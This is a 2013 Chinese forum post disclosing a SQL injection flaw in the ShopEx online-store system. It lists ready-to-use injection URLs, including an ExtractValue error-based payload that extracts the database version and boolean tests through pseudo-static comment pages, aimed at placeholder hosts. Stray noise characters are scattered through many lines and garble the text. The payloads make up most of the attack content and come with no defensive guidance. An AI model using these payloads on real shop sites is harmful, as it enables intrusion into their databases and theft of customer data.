注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
* R) b4 i1 n, D# f
9 I: v$ z6 J( F% o3 N1 {好吧,我扯远了~~
% _2 Y' R Y2 f( m. [5 i+ B其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
6 T e% W- C0 \6 ?* J; B/ q不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
9 G0 @% d u5 Y: A% a! A
. {: j! A$ _$ ?% [8 lhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
5 J# {1 Z: n$ V/ L& {3 p
6 `* J. [. P7 p% g3 P/ Zhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html " X% b: J7 D! P' T
$ B5 A8 c, ?3 Ehttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
# A8 \ a! q. [3 S' j+ I z" R: q2 E
9 @& P6 z( Y4 P( }6 [, lhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 6 @ v# _& f8 C3 o5 R( l5 G# @) H t
5 }: b8 x, {5 e2 w1 H/ P- W4 j' H 1 Y O7 `7 V y) ? W
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
" x; P& x9 t; j6 @5 t3 F如何注入就不多说了,10多年的东西了…不会也会了… 0 w/ V1 y* [0 l! W- P
1 Y) Q& O8 L c+ p% a! f- e
" p5 l4 X) v0 y3 b4 m) z/ Y6 @, I* C! ]: v% r6 P
$ {. E3 r: k0 `' L' q* ~5 K |
发表于 2013-2-19 08:31:27
收藏
支持
反对